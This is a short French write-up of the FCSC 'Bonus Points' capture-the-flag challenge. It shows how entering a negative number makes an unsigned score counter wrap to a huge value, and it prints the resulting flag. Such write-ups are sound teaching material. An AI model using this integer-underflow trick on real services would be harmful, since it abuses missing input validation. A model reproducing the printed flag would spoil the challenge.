# Bonus Points - pwn

**Challenge**

Qui n'a pas envie de quelques points bonus ? Obtenez un score supérieur à 1000 pour débloquer le flag.

nc challenges2.france-cybersecurity-challenge.fr 4001

SHA256([bonuspoints](bonuspoints)) = 8c05bb6a86ea741b6af1412ae0da562513345e00ad2096fd41bdd83f984b4b64.

**Solutions**

On lance le binaire pour comprendre ce qu'il demande :

```console
$ nc challenges2.france-cybersecurity-challenge.fr 4001 
Hello, here you can get some bonus points for the competition.
You cannot get more than 100 bonus points.
If you go above 1 000 you win.
Your score is currently 36
How many bonus points do you want ?
>>>
```

L'énoncé est clair. Évidemment, si on demande plus de 100 points, on se fait traiter de tricheur.
Sans même faire de rétro-ingénierie du binaire, on peut supposer que le score est conservé dans
un entier. Et s'il nous est interdit de dépenser plus de 100 points, rien ne dit qu'on ne peut
pas soumettre une valeur négative. Comme la réprésentation d'un entier en mémoire a une taille
limitée, et en supposant que l'entier est non signé, on soustrayant une valeur supérieur à
notre score, on va se retrouver avec un score positif très grand. Essayons :

```console
$ nc challenges2.france-cybersecurity-challenge.fr 4001
Hello, here you can get some bonus points for the competition.
You cannot get more than 100 bonus points.
If you go above 1000 you win.
Your score is currently 92
How many bonus points do you want?
>>> -6000
Your new score is 4294961388
Congratulations! Here is your flag:
FCSC{750882cf64feb04b384cfa42bbf2167eab337671e663ab238339c6cee884851d}
```